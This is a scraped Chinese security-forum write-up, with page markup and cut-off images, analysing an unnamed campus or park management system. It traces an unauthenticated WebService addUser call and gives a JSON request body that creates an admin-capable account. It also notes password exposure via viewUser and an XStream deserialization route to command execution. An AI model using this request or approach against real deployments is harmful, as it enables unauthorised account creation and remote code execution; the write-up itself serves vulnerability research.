translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50">
|
|||
|
|
<nav class="navbar navbar-inverse navbar-fixed-top">
|
|||
|
|
<div class="container nav">
|
|||
|
|
<div class="visible-xs header-response sf-hidden">
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="row hidden-xs">
|
|||
|
|
<div class="col-sm-8 col-md-8 col-lg-8">
|
|||
|
|
<div class=navbar-header>
|
|||
|
|
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</button>
|
|||
|
|
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="collapse navbar-collapse" id=global-navbar>
|
|||
|
|
<ul class="nav navbar-nav">
|
|||
|
|
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/questions>问答</a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/shop>商城</a></li>
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/movable>活动</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
|
|||
|
|
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
|
|||
|
|
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
|
|||
|
|
<input type=text name=word id=searchBox class=form-control placeholder value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</nav>
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main" style=width:100%>
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">漏洞挖掘之再探某园区系统</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
上次提到还有一处可能存在任意用户登录的点,最近没什么研究就写一下,顺便看看还有其他漏洞不
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>漏洞挖掘之再探某园区系统
|
|||
|
|
============
|
|||
|
|
|
|||
|
|
上次提到还有一处可能存在任意用户登录的点,最近没什么研究就写一下,顺便看看还有其他漏洞不
|
|||
|
|
|
|||
|
|
0x01 任意用户登录
|
|||
|
|
-----------
|
|||
|
|
|
|||
|
|
### 1、漏洞分析
|
|||
|
|
|
|||
|
|
通过上次提到的搜索new UserBean()的思路,发现还有一处创建用户的方法
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
public void addUser(WsAdminParam<ExUserBean> adminParam) {
|
|||
|
|
ExUserBean bean = (ExUserBean)adminParam.getParam();
|
|||
|
|
UserBean userBean = new UserBean();
|
|||
|
|
userBean.setOwnerCode(bean.getOrgCode());
|
|||
|
|
userBean.setRoleIds(bean.getRoleIds());
|
|||
|
|
userBean.setLoginName(bean.getLoginName());
|
|||
|
|
userBean.setIsReuse(bean.getIsReuse() ? 1 : 0);
|
|||
|
|
userBean.setLoginPass(bean.getLoginPass());
|
|||
|
|
userBean.setUserName(bean.getUserName());
|
|||
|
|
userBean.setUserType(0);
|
|||
|
|
this.userManager.addUser(userBean);
|
|||
|
|
UserCache.addUserToUserList(userBean);
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
可以看到通过传入WsAdminParam类型参数,获取param对象的成员遍历对UseBean进行赋值初始化,最后保存到数据库中
|
|||
|
|
|
|||
|
|
接下来就是找哪里调用了addUser这个方法,根据前面我们发现调用都是`接口.方法名`,于是构造ExUserManager.addUser
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
并没有其他调用,难道这只是单纯实现了方法?
|
|||
|
|
|
|||
|
|
扩大搜索面只搜索`ExUserManager`接口名,排除类定义等干扰信息我们有了新的收获
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_QUERY_USER,WsMethod.bulid(ExUserManager.class.getMethod("queryUser", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_DELETE_USER,WsMethod.bulid(ExUserManager.class.getMethod("deleteUsers", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_ADD_USER,WsMethod.bulid(ExUserManager.class.getMethod("addUser", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_VIEW_USER,WsMethod.bulid(ExUserManager.class.getMethod("viewUser", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_UPDATE_USER,WsMethod.bulid(ExUserManager.class.getMethod("updateUser", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_UPDATE_USER_PASSWORD,WsMethod.bulid(ExUserManager.class.getMethod("updateUserPassword", WsAdminParam.class), ExUserBean.class));
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
在AdminWebServiceImpl类的静态代码块中初始化了interfaceMethodsMap数组,其中将`ExUserManager`方法对象进行存储。
|
|||
|
|
|
|||
|
|
在`executeInterface`方法中对interfaceMethodsMap数组进行了取值操作
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
假设我们想调用addUser这个方法需要指定`interfaceMethodsMap`的key为`admin_011_02`(下面会讲到),map会返回我们`WsMethod`对象,那么`WsMethod#getExtClass`返回的值就是map中的 `WsMethod.bulid` 的第⼆个参数,也就是`ExUserBean`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`WsAdminParam.fromJson(jsonParam, method.getExtClass());`⽅法如下:这⾥将我们传⼊的第⼆个参数⾸先进⾏json解析,移除json中的param参数,然后再分别进⾏json反序列化,第⼀次反序列化是将移除的param json数据转化为`ExUserBean`类型,第⼆次反序列化是将 传⼊的json转化为 `WsAdminParam` 类型,最后将`ExUserBean`重新设置到 `WsAdminParam` 对象中,因此我们传⼊的参数主要是在反序列化为 `WsAdminParam` 对象
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
观察 `WsAdminParam` 类成员变量,发现需要这些参数:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
那我们在`executeInterface`方法中传入的jsonParam的值应为:
|
|||
|
|
|
|||
|
|
```json
|
|||
|
|
{
|
|||
|
|
"authorinize": {
|
|||
|
|
"userName": "11",
|
|||
|
|
"password": "11",
|
|||
|
|
"loginCode": "11"
|
|||
|
|
},
|
|||
|
|
"locale": "1",
|
|||
|
|
"param": {"orgCode":"001","loginName":"test","roleIds":"1","loginPass":"test","isReuse":0,"oldLoginName":"xxx","oldRoleIds":"1","userName":"test"},
|
|||
|
|
"paramStr": "11",
|
|||
|
|
"langLocale": "11",
|
|||
|
|
"orders": [{"propertyName": "1","isAscending": true}]
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
其中param对应了初始化ExUserBean对象的变量值
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
那么executeInterface方法在哪调用呢?
|
|||
|
|
|
|||
|
|
我们发现AdminWebServiceImpl类注解为@WebService
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
@WebService(
|
|||
|
|
targetNamespace = "http://webservice.dhsoft.com"
|
|||
|
|
)
|
|||
|
|
public class AdminWebServiceImpl implements AdminWebService
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
> WebService是一种跨编程语言和跨操作系统平台的远程调用技术。
|
|||
|
|
>
|
|||
|
|
> 所谓跨编程语言和跨操作平台,就是说服务端程序采用java编写,客户端程序则可以采用其他编程语言编写,反之亦然!跨操作系统平台则是指服务端程序和客户端程序可以在不同的操作系统上运行。
|
|||
|
|
>
|
|||
|
|
> Java中常用注解来注册WebService服务,常见注解有
|
|||
|
|
>
|
|||
|
|
> @WebService:此注示用来标明此java类为某个WebService的实现类或者标明此java接口定义了某个WebService的接口。即定义服务
|
|||
|
|
>
|
|||
|
|
> @WebMethod:定义方法,在公共方法上面表示该方法要作为服务发布,仅支持在使用@webservice注解来注解的类上使用@WebMethod注解
|
|||
|
|
>
|
|||
|
|
> @WebResult:注解用于定制从返回值至 WSDL 部件或 XML 元素的映射。即定义返回值
|
|||
|
|
>
|
|||
|
|
> @WebParam: 注解用于定制从单个参数至 Web Service 消息部件(message元素)和 XML 元素的映射。即定义参数
|
|||
|
|
|
|||
|
|
向上进入AdminWebService接口
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
其中定义了interfaceMethodsMap数组interfaceId的具体值,我们调用addUser时interfaceId=admin\_011\_002;并且将executeInterface注册在了WebService服务中。
|
|||
|
|
|
|||
|
|
根据java中WebService的配置,我们在配置文件中找的AdminWebService注册的路由(厚码保命)
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
而在web.xml中WebService服务是由CXFServlet来处理的
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
此时路由并没有配置拦截器可以未授权访问。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
### 2、漏洞复现
|
|||
|
|
|
|||
|
|
我们利用burp中的插件Wsdler帮助我们生成webservice的xml格式
|
|||
|
|
|
|||
|
|
首先访问该seervice的wsdl
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
随后burp抓取该请求包,并parse wsdl
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
随后在插件中得到请求格式
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
我们把前面构造的两个参数带入到请求包中,成功创建用户
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
并使用该用户登录到后台
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
0x03 其他利用点
|
|||
|
|
----------
|
|||
|
|
|
|||
|
|
我们对比两个添加用户的方法发现构造完userbean对象后都调用了`this.userManager.addUser`方法,我们可以精确搜索
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
发现还有其他两个接口可以创建用户。
|
|||
|
|
|
|||
|
|
而在`AdminWebServiceImpl`的`interfaceMethodsMap`中除了`adduser`还有其他方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
比如`queryUser`可以查看用户信息
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`viewUser`可以查看对应用户的密码
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
另外在lib中看到低版本的xstream依赖
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
xstream主要是在调用fromXML和toXML方法如果传入参数可控就大概率存在反序列化漏洞
|
|||
|
|
|
|||
|
|
利用jar-analyzer工具快速找出项目中调用相关方法的位置
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
挑选addDevs方法,找的具体实现的代码
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
这里`getFormatedDevXStream`是获取XStream对象
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
如果`validateAndReturnXmlInfo`方法的返回可控就可以进行反序列化,跟进发现
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
可以看到`validateAndReturnXmlInfo`其实是获取请求参数`xmlInfo`的值,这个我们是可控,构造payload。
|
|||
|
|
|
|||
|
|
这里使用woodpecker插件进行XStream Payload的生成(工具地址:[https://github.com/woodpecker-framework/woodpecker-framework-release;插件地址“https://github.com/woodpecker-appstore/xstream-vuldb](https://github.com/woodpecker-framework/woodpecker-framework-release%EF%BC%9B%E6%8F%92%E4%BB%B6%E5%9C%B0%E5%9D%80%E2%80%9Chttps://github.com/woodpecker-appstore/xstream-vuldb)”)
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
复制出来去除缩进的空格和换行后将其进行URL全编码,访问接口并传参
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
成功执行ping命令</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h1 blockindex=0>漏洞挖掘之再探某园区系统</h1>
|
|||
|
|
<p blockindex=1>上次提到还有一处可能存在任意用户登录的点,最近没什么研究就写一下,顺便看看还有其他漏洞不</p>
|
|||
|
|
<h2 blockindex=2>0x01 任意用户登录</h2>
|
|||
|
|
<h3 blockindex=3>1、漏洞分析</h3>
|
|||
|
|
<p blockindex=4>通过上次提到的搜索new UserBean()的思路,发现还有一处创建用户的方法</p>
|
|||
|
|
<pre blockindex=5><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>void</span> <span class=hljs-title>addUser</span><span class=hljs-params>(WsAdminParam<ExUserBean> adminParam)</span> </span>{
|
|||
|
|
ExUserBean bean = (ExUserBean)adminParam.getParam();
|
|||
|
|
UserBean userBean = <span class=hljs-keyword>new</span> UserBean();
|
|||
|
|
userBean.setOwnerCode(bean.getOrgCode());
|
|||
|
|
userBean.setRoleIds(bean.getRoleIds());
|
|||
|
|
userBean.setLoginName(bean.getLoginName());
|
|||
|
|
userBean.setIsReuse(bean.getIsReuse() ? <span class=hljs-number>1</span> : <span class=hljs-number>0</span>);
|
|||
|
|
userBean.setLoginPass(bean.getLoginPass());
|
|||
|
|
userBean.setUserName(bean.getUserName());
|
|||
|
|
userBean.setUserType(<span class=hljs-number>0</span>);
|
|||
|
|
<span class=hljs-keyword>this</span>.userManager.addUser(userBean);
|
|||
|
|
UserCache.addUserToUserList(userBean);
|
|||
|
|
}
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=6>可以看到通过传入WsAdminParam类型参数,获取param对象的成员遍历对UseBean进行赋值初始化,最后保存到数据库中</p>
|
|||
|
|
<p blockindex=7>接下来就是找哪里调用了addUser这个方法,根据前面我们发现调用都是<code>接口.方法名</code>,于是构造ExUserManager.addUser</p>
|
|||
|
|
<p blockindex=8><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=9>并没有其他调用,难道这只是单纯实现了方法?</p>
|
|||
|
|
<p blockindex=10>扩大搜索面只搜索<code>ExUserManager</code>接口名,排除类定义等干扰信息我们有了新的收获</p>
|
|||
|
|
<pre blockindex=11><code class="hljs language-java">interfaceMethodsMap.put(AdminWebService.INTERFACE_QUERY_USER,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"queryUser"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_DELETE_USER,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"deleteUsers"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_ADD_USER,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"addUser"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_VIEW_USER,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"viewUser"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_UPDATE_USER,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"updateUser"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
interfaceMethodsMap.put(AdminWebService.INTERFACE_UPDATE_USER_PASSWORD,WsMethod.bulid(ExUserManager.class.getMethod(<span class=hljs-string>"updateUserPassword"</span>, WsAdminParam.class), ExUserBean.class));
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=12>在AdminWebServiceImpl类的静态代码块中初始化了interfaceMethodsMap数组,其中将<code>ExUserManager</code>方法对象进行存储。</p>
|
|||
|
|
<p blockindex=13>在<code>executeInterface</code>方法中对interfaceMethodsMap数组进行了取值操作</p>
|
|||
|
|
<p blockindex=14><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA8gAAAK6CAIAAABqreIrAAAgAElEQVR4nOydd3gUx/n439nrRbo76e506jr1XukgmjDNFAOmupfgFsd2HieOndhxfnESJ46T2HHyddyN49i4YGMDBtNMFxIIgYSEejmVO93pei87vz8kISGk0wkkEHg+D3+g251933nn3dl3Z96dQamZk4BAIBAIBAKBQCBcHdT1VoBAIBAIBAKBQLgZIIE1gUAgEAgEAoEwBpDAmkAgEAgEAoFAGANIYE0gjBcIoeutAoFAGBcwjRDC11sLAoEw4RjfwBrTFI/BBpr0PoQfF5iGoNTVjz55ewKDOP9NDkZIwCSt/KODl7nhiUeXJ/BH3fSYkuUue+DRX7zwcFHEeChGIBCuLwypfBzv7fzc915Uun9orXVdOnSHxXe/WvTshpS1K5PXTsInD+rNl5eNSnjpj5MK3Z0/NHon6LBfwsKpH2yOcJe3V9snqIaEgWDB5Oj1v0tc+XDM7NtCY7G5/Lx33EaUeUmrHrwjQ/vd50fa7TDO49bX0g9jJyX/fZnEVddd77qePo95wk2L4x8vilo/SVYYQddU24zXcXJAovjTA/GxHZoy84TrB65xH5U4NfnVpcHWGkOTZ8KZYszx6DSQvnLlFEFTea2ZHkV9eVPu+Mlszrlvt/1Q2W5zk1cyAuFmgzmuV6cQY+gDxm0vH9jDgMRVsx6PHKasx2O2eDyuseh2MC943ZqU5ZnBYVywG63nyls+3NnZ2Nf147CYVx8Jr3in+MO20T0MXE632UrbvWOg4Q0Blt2eduds8yePd6gDNVTwys8yJkn6r4A1nW/f0aIaufgVyBrhgnSQfPXzkcH76j74g90bwg82OcbkukPKEuSuXjfVe+xfn5fpgOrX/ybwQ7fLY3Zgl28URbBE9vxycfWu2i91Y9WUVNGChFuDdP+3rbGVZsUJfa1jct3LyC7K/HUGu18udu3+rPIDzZC1uNqsn5vANwDA5fKZ7T4nPY4iIqYk/32aEAC8Xo/R4qyr7/qixNjmuw5xPMLa4k8+kv908/qVLW98VumkAtWBz+cjY03Z2QZtwEUIBMINxPgG1sOBwKpzWDEtdQ5/jqb1L8+2AsDVdj2YZq24f/JPZN3v/rf0lBEp4uSriuLmn9M0NvbF7BxOeCirfvRJMW2Hz9x1+Eo0xAA8ATc+Xloot324Vx94j3ydYYZwJRLbaJQ1f/+zssOImf9c1hxPyz9f0Xtpj2m8ZI1EgjCCayv5Sq9SATQ7OwHGx+yYRsp5S1K9Je/tbaUHRtU3hR92VjQ9WTFKWUymQsRqGUtj8xLDqPZz2mMaN4BbpR2vpqw+VvNECQgzlC9Npj/5b8tJL7Zax0POTeIbAKAqb3ii/ErEjU43n/H9LapzTKYiMnTj7PgXxY1P7jRar0cvilyNu3edSb9z6awjlfs0gZYymExYJBID